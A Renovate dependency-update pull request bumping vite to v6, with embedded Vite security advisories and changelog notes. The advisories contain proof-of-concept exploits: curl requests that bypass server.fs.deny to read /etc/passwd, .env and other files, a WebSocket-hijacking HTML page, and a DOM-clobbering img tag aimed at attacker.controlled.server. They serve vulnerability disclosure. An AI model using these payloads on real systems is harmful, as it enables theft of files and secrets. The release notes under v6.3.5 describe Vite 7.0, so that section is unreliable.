sr2/keycloak-theme-cloud

Fork 0

Update dependency vite to v6 [SECURITY] #7

Open

renovate wants to merge 1 commit from renovate/npm-vite-vulnerability into main

renovate commented

2026-05-20 09:36:30 +00:00

Member

This PR contains the following updates:

Package	Change	Age	Confidence
vite (source)	`^5.0.8` → `^6.0.0`

Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

CVE-2024-45812 / GHSA-64vr-g452-qvp3

More information

Details

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

Severity

CVSS Score: 4.8 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite's `server.fs.deny` is bypassed when using `?import&raw`

CVE-2024-45811 / GHSA-9cwx-2883-4wfx

More information

Details

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

##### expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

##### security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Severity

CVSS Score: 6.9 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Websites were able to send any requests to the development server and read the response in vite

CVE-2025-24010 / GHSA-vg6x-rcgg-rjx6

More information

Details

Summary

Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.

Warning

This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.

Upgrade Path

Users that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.

Using the backend integration feature
Using a reverse proxy in front of Vite
Accessing the development server via a domain other than localhost or *.localhost
Using a plugin / framework that connects to the WebSocket server on their own from the browser

Using the backend integration feature

If you are using the backend integration feature and not setting server.origin, you need to add the origin of the backend server to the server.cors.origin option. Make sure to set a specific origin rather than *, otherwise any origin can access your development server.

Using a reverse proxy in front of Vite

If you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than localhost or *.localhost, you need to add the hostname to the new server.allowedHosts option. For example, if the reverse proxy is sending requests to http://vite:5173, you need to add vite to the server.allowedHosts option.

Accessing the development server via a domain other than `localhost` or `*.localhost`

You need to add the hostname to the new server.allowedHosts option. For example, if you are accessing the development server via http://foo.example.com:8080, you need to add foo.example.com to the server.allowedHosts option.

Using a plugin / framework that connects to the WebSocket server on their own from the browser

If you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.

In that case, you can either:

fix the plugin / framework code to the make it compatible with the new version of Vite
set legacy.skipWebSocketTokenCheck: true to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite
- When enabling this option, make sure that you are aware of the security implications described in the impact section of [2] above.

Mitigation without upgrading Vite

[1]: Permissive default CORS settings

Set server.cors to false or limit server.cors.origin to trusted origins.

[2]: Lack of validation on the Origin header for WebSocket connections

There aren't any mitigations for this.

[3]: Lack of validation on the Host header for HTTP requests

Use Chrome 94+ or use HTTPS for the development server.

Details

There are three causes that allowed malicious websites to send any requests to the development server:

[1]: Permissive default CORS settings

Vite sets the Access-Control-Allow-Origin header depending on server.cors option. The default value was true which sets Access-Control-Allow-Origin: *. This allows websites on any origin to fetch contents served on the development server.

Attack scenario:

The attacker serves a malicious web page (http://malicious.example.com).
The user accesses the malicious web page.
The attacker sends a fetch('http://127.0.0.1:5173/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
The attacker gets the content of http://127.0.0.1:5173/main.js.

[2]: Lack of validation on the Origin header for WebSocket connections

Vite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server did not perform validation on the Origin header and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection (list of the file paths that changed, the file content where the errored happened, etc.), but plugins can send arbitrary messages and may include more sensitive information.

Attack scenario:

The attacker serves a malicious web page (http://malicious.example.com).
The user accesses the malicious web page.
The attacker runs new WebSocket('http://127.0.0.1:5173', 'vite-hmr') by JS in that malicious web page.
The user edits some files.
Vite sends some HMR messages over WebSocket.
The attacker gets the content of the HMR messages.

[3]: Lack of validation on the Host header for HTTP requests

Unless server.https is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.

The attacker serves a malicious web page that is served on HTTP (http://malicious.example.com:5173) (HTTPS won't work).
The user accesses the malicious web page.
The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).
The attacker sends a fetch('/main.js') request by JS in that malicious web page.
The attacker gets the content of http://127.0.0.1:5173/main.js bypassing the same origin policy.

Impact

[1]: Permissive default CORS settings

Users with the default server.cors option may:

get the source code stolen by malicious websites
give the attacker access to functionalities that are not supposed to be exposed externally
- Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.

[2]: Lack of validation on the Origin header for WebSocket connections

All users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.

For users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.

For users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.

[3]: Lack of validation on the Host header for HTTP requests

Users using HTTP for the development server and using a browser that is not Chrome 94+ may:

get the source code stolen by malicious websites
give the attacker access to functionalities that are not supposed to be exposed externally
- Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.

Chrome 94+ users are not affected for [3], because sending a request to a private network page from public non-HTTPS page is forbidden since Chrome 94.

Safari has a bug that blocks requests to loopback addresses from HTTPS origins. This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of "the malicious web page is served on HTTP" to make [1] and [2] to work.

PoC

[2]: Lack of validation on the Origin header for WebSocket connections

I used the react template which utilizes HMR functionality.

npm create vite@latest my-vue-app-react -- --template react

Then on a malicious server, serve the following POC html:

<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <title>vite CSWSH</title>
    </head>
    <body>
        <div id="logs"></div>
        <script>
            const div = document.querySelectorAll('#logs')[0];
            const ws = new WebSocket('ws://localhost:5173','vite-hmr');
            ws.onmessage = event => {
                const logLine = document.createElement('p');
                logLine.innerHTML = event.data;
                div.append(logLine);
            };
        </script>
    </body>
</html>

Kick off Vite

npm run dev

Load the development server (open http://localhost:5173/) as well as the malicious page in the browser.
Edit src/App.jsx file and intentionally place a syntax error
Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed

Here's a video demonstrating the POC:

https://github.com/user-attachments/assets/a4ad05cd-0b34-461c-9ff6-d7c8663d6961

Severity

CVSS Score: 6.5 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite bypasses server.fs.deny when using ?raw??

CVE-2025-30208 / GHSA-x574-m823-4x7w

More information

Details

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

##### expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

##### security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Severity

CVSS Score: 5.3 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query

CVE-2025-31125 / GHSA-4r4m-qw57-chr8

More information

Details

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

base64 encoded content of non-allowed files is exposed using ?inline&import (originally reported as ?import&?inline=1.wasm?init)
content of non-allowed files is exposed using ?raw?import

/@fs/ isn't needed to reproduce the issue for files inside the project root.

PoC

Original report (check details above for simplified cases):

The ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Example full URL http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init

Severity

CVSS Score: 5.3 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite allows server.fs.deny to be bypassed with .svg or relative paths

CVE-2025-31486 / GHSA-xcj6-pq6g-qj4x

More information

Details

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

`.svg`

Requests ending with .svg are loaded at this line.
037f801075/packages/vite/src/node/plugins/asset.ts (L285-L290)
By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the restriction was able to bypass.

This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using Vite 6.0+.

relative paths

The check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. ../../).

PoC

npm create vite@latest
cd vite-project/
npm install
npm run dev

send request to read etc/passwd

curl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'

curl 'http://127.0.0.1:5173/@&#8203;fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'

Severity

CVSS Score: 5.3 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite has an `server.fs.deny` bypass with an invalid `request-target`

CVE-2025-32395 / GHSA-356w-63v5-8wf4

More information

Details

Summary

The contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.

Impact

Only apps with the following conditions are affected.

explicitly exposing the Vite dev server to the network (using --host or server.host config option)
running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)

Details

HTTP 1.1 spec (RFC 9112) does not allow # in request-target. Although an attacker can send such a request. For those requests with an invalid request-line (it includes request-target), the spec recommends to reject them with 400 or 301. The same can be said for HTTP 2 (ref1, ref2, ref3).

On Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of http.IncomingMessage.url contains #. Vite assumed req.url won't contain # when checking server.fs.deny, allowing those kinds of requests to bypass the check.

On Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of http.IncomingMessage.url did not contain #.

PoC

npm create vite@latest
cd vite-project/
npm install
npm run dev

send request to read /etc/passwd

curl --request-target /@&#8203;fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173

Severity

CVSS Score: 6.0 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite's server.fs.deny bypassed with /. for files under project root

CVE-2025-46565 / GHSA-859w-5945-r5v3

More information

Details

Summary

The contents of files in the project root that are denied by a file matching pattern can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
Only files that are under project root and are denied by a file matching pattern can be bypassed.

Examples of file matching patterns: .env, .env.*, *.{crt,pem}, **/.env
Examples of other patterns: **/.git/**, .git/**, .git/**/*

Details

server.fs.deny can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns).
These patterns were able to bypass for files under root by using a combination of slash and dot (/.).

PoC

npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env/. http://localhost:5173

Severity

CVSS Score: 6.0 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite middleware may serve files starting with the same name with the public directory

CVE-2025-58751 / GHSA-g4jq-h2w9-997c

More information

Details

Summary

Files starting with the same name with the public directory were served bypassing the server.fs settings.

Impact

Only apps that match the following conditions are affected:

explicitly exposes the Vite dev server to the network (using --host or server.host config option)
uses the public directory feature (enabled by default)
a symlink exists in the public directory

Details

The servePublicMiddleware function is in charge of serving public files from the server. It returns the viteServePublicMiddleware function which runs the needed tests and serves the page. The viteServePublicMiddleware function checks if the publicFiles variable is defined, and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. publicFiles may be undefined if there is a symbolic link anywhere inside the public directory. In that case, every requested page will be passed to the public serving function. The serving function is based on the sirv library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware disables this functionality since public pages are meant to be available always, regardless of whether they are in the allow or deny list.

In the case of public pages, the serving function is provided with the path to the public directory as a root directory. The code of the sirv library uses the join function to get the full path to the requested file. For example, if the public directory is "/www/public", and the requested file is "myfile", the code will join them to the string "/www/public/myfile". The code will then pass this string to the normalize function. Afterwards, the code will use the string's startsWith function to determine whether the created path is within the given directory or not. Only if it is, it will be served.

Since sirv trims the trailing slash of the public directory, the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at "/www", and the public directory is at "/www/p", if the created path will be "/www/private.txt", the startsWith function will still return true, because the string "/www/private.txt" starts with "/www/p". To achieve this, the attacker will use ".." to ask for the file "../private.txt". The code will then join it to the "/www/p" string, and will receive "/www/p/../private.txt". Then, the normalize function will return "/www/private.txt", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
mkdir p
cd p
ln -s a b
cd ..
echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js
echo  "secret" > private.txt
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/private.txt'

You will receive a 403 HTTP Response, because private.txt is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/../private.txt'

You will receive the contents of private.txt.

f0113f3f82

Severity

CVSS Score: 2.3 / 10 (Low)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite's `server.fs` settings were not applied to HTML files

CVE-2025-58752 / GHSA-jqfw-vq24-v9c3

More information

Details

Summary

Any HTML files on the machine were served regardless of the server.fs settings.

Impact

Only apps that match the following conditions are affected:

explicitly exposes the Vite dev server to the network (using --host or server.host config option)
appType: 'spa' (default) or appType: 'mpa' is used

This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.

Details

The serveStaticMiddleware function is in charge of serving static files from the server. It returns the viteServeStaticMiddleware function which runs the needed tests and serves the page. The viteServeStaticMiddleware function checks if the extension of the requested file is ".html". If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case htmlFallbackMiddleware, and then to indexHtmlMiddleware. These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
echo  "secret" > /tmp/secret.html
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:

echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)
mkdir secret_files
echo "secret txt" > secret_files/secret.txt
echo "secret html" > secret_files/secret.html
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'

You will receive a 403 HTTP Response, because everything in the secret_files directory is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'

You will receive the contents of secret_files/secret.html.

Severity

CVSS Score: 2.3 / 10 (Low)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

vite allows server.fs.deny bypass via backslash on Windows

CVE-2025-62522 / GHSA-93m4-6634-74q7

More information

Details

Summary

Files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows.

Impact

Only apps that match the following conditions are affected:

explicitly exposes the Vite dev server to the network (using --host or server.host config option)
running the dev server on Windows

Details

server.fs.deny can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass by using a back slash(\). The root cause is that fs.readFile('/foo.png/') loads /foo.png.

PoC

npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env\ http://localhost:5173

Severity

CVSS Score: 6.0 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling

CVE-2026-39365 / GHSA-4w7w-66w2-5vf9

More information

Details

Summary

Any files ending with .map even out side the project can be returned to the browser.

Impact

Only apps that match the following conditions are affected:

explicitly exposes the Vite dev server to the network (using --host or server.host config option)
have a sensitive content in files ending with .map and the path is predictable

Details

In Vite v7.3.1, the dev server’s handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files located outside the project root, provided they can be parsed as valid source map JSON.

PoC

Create a minimal PoC sourcemap outside the project root

cat > /tmp/poc.map <<'EOF'
{"version":3,"file":"x.js","sources":[],"names":[],"mappings":""}
EOF

Start the Vite dev server (example)

pnpm -C playground/fs-serve dev --host 127.0.0.1 --port 18080

Confirm that direct /@fs access is blocked by strict (returns 403)
Inject ../ segments under the optimized deps .map URL prefix to reach /tmp/poc.map

Severity

CVSS Score: 6.3 / 10 (Medium)
Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

vitejs/vite (vite)

`v6.4.2`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.4.1`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.4.0`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.3.7`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.3.6`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.3.5`

Compare Source

Today, we're excited to announce the release of the next Vite major:

Vite 7.0 announcement blog post
Docs (translations: 简体中文, 日本語, Español, Português, 한국어, Deutsch, فارسی)
Migration Guide

⚠ BREAKING CHANGES

ssr: don't access Object variable in ssr transformed code (#19996) (fceff60)
remove experimental.skipSsrTransform option (#20038) (6c3dd8e)
remove HotBroadcaster (#19988) (cda8c94)
css: always use sass compiler API (#19978) (3bfe5c5)
bump build.target and name it baseline-widely-available (#20007) (4a8aa82)
bump required node version to 20.19+, 22.12+ and remove cjs build (#20032) (2b80243)
css: remove sass legacy API support (#19977) (6eaccc9)
remove deprecated HotBroadcaster related types (#19987) (86b5e00)
remove deprecated no-op type only properties (#19985) (9151c24)
remove node 18 support (#19972) (00b8a98)
remove deprecated hook-level enforce/transform from transformIndexHtml hook (#19349) (6198b9d)
remove deprecated splitVendorChunkPlugin (#19255) (91a92c7)

Features

types: use terser types from terser package (#20274) (a5799fa)
apply some middlewares before configurePreviewServer hook (#20224) (b989c42)
apply some middlewares before configureServer hook (#20222) (f5cc4c0)
add base option to import.meta.glob (#20163) (253d6c6)
add this.meta.viteVersion (#20088) (f55bf41)
allow passing down resolved config to vite's createServer (#19894) (c1ae9bd)
buildApp hook (#19971) (5da659d)
build: provide names for asset entrypoints (#19912) (c4e01dc)
bump build.target and name it baseline-widely-available (#20007) (4a8aa82)
client: support opening fileURL in editor (#20040) (1bde4d2)
make PluginContext available for Vite-specific hooks (#19936) (7063839)
resolve environments plugins at config time (#20120) (f6a28d5)
stabilize css.preprocessorMaxWorkers and default to true (#19992) (70aee13)
stabilize optimizeDeps.noDiscovery (#19984) (6d2dcb4)

Bug Fixes

deps: update all non-major dependencies (#20271) (6b64d63)
keep import.meta.url in bundled Vite (#20235) (3bf3a8a)
module-runner: export ssrExportNameKey (#20266) (ac302a7)
module-runner: expose normalizeModuleId (#20277) (9b98dcb)
deps: update all non-major dependencies (#20181) (d91d4f7)
deps: update all non-major dependencies (#20212) (a80339b)
align dynamic import detection (#20115) (1ea2222)
applyToEnvironment after configResolved (#20170) (a330b80)
deps: update all non-major dependencies (#20141) (89ca65b)
handle dynamic import with .then(m => m.a) (#20117) (7b7410a)
hmr: use monotonicDateNow for timestamp (#20158) (8d26785)
optimizer: align relative build.rollupOptions.input resolution with rollup (#20080) (9759c29)
ssr: don't access Object variable in ssr transformed code (#19996) (fceff60)
types: prefer sass-embedded types over sass types for preprocessorOptions.sass (fix #20150) (#20166) (7db56be)
virtual svg module (#20144) (7dfcb31)
client: render the last part of the stacktrace (#20039) (c7c1743)
cli: make cleanGlobalCLIOptions() clean --force (#19999) (d4a171a)
css: remove alias exclude logic from rebaseUrl (#20100) (44c6d01)
css: sass rebase url in relative imported modules (#20067) (261fad9)
css: should not wrap with double quote when the url rebase feature bailed out (#20068) (a33d0c7)
deps: update all non-major dependencies (#19953) (ac8e1fb)
deps: update all non-major dependencies (#20061) (7b58856)
importing an optional peer dep should throw an runtime error (#20029) (d0221cd)
merge environments.*.resolve.noExternal properly (#20077) (daf4a25)
merge server.allowedHosts: true correctly (#20138) (2ade756)
optimizer: non object module.exports for Node builtin modules in CJS external facade (#20048) (00ac6e4)
optimizer: show error when computeEntries failed (#20079) (b742b46)
treat all optimizeDeps.entries values as globs (#20045) (1422395)
types: expose additional PluginContext types (#20129) (b6df9aa)

Performance Improvements

utils: improve performance of numberToPos (#20244) (3f46901)

Documentation

tiny typo (#20110) (d20fc2c)

Miscellaneous Chores

"indentity" → "identity" in test description (#20225) (ea9aed7)
deps: update rolldown-related dependencies (#20270) (f7377c3)
typos in comments (#20259) (b135918)
deps: update rolldown-related dependencies (#20182) (6172f41)
deps: update rolldown-related dependencies (#20211) (b13b7f5)
add a way to disable source maps when developing Vite (#20168) (3a30c0a)
deps: update rolldown-related dependencies (#20140) (0387447)
fix source map support when developing Vite (#20167) (279ab0d)
use destructuring alias in buildEnvironment function (#19472) (501572a)
declare version range for peer dependencies (#19979) (c9bfd57)
deprecate ResolvedConfig.createResolver and recommend createIdResolver (#20031) (d101d64)
fix comment for devEnvironmentOptions.moduleRunnerTransform (#20035) (338081d)
generate dts internally by rolldown-plugin-dts (#20093) (a66afa3)
remove deprecated splitVendorChunkPlugin (#19255) (91a92c7)
remove node 18 support (#19972) (00b8a98)
remove redundant word in comment (#20139) (9b2964d)
remove unused deps (#20097) (d11ae6b)
rename rollup to rolldown where appropriate (#20096) (306e250)
speed up typechecking (#20131) (a357c19)
use plugin hooks filter for patch-types plugin for bundling vite (#20089) (c127955)
use rolldown to bundle Vite itself (#19925) (7753b02)
use rolldown-plugin-dts for dts bundling (#19990) (449d7f3)

Code Refactoring

worker: set virtual file content in load hook (#20160) (0d60667)
bump required node version to 20.19+, 22.12+ and remove cjs build (#20032) (2b80243)
css: always use sass compiler API (#19978) (3bfe5c5)
css: remove sass legacy API support (#19977) (6eaccc9)
merge src/node/publicUtils.ts to src/node/index.ts (#20086) (999a1ed)
remove experimental.skipSsrTransform option (#20038) (6c3dd8e)
remove HotBroadcaster (#19988) (cda8c94)
remove options?.ssr support in clientInjectionsPlugin (#19589) (88e0076)
remove backward compat for calling internal plugins directly (#20001) (9072a72)
remove deprecated HotBroadcaster related types (#19987) (86b5e00)
remove deprecated env api properties (#19986) (52e5a1b)
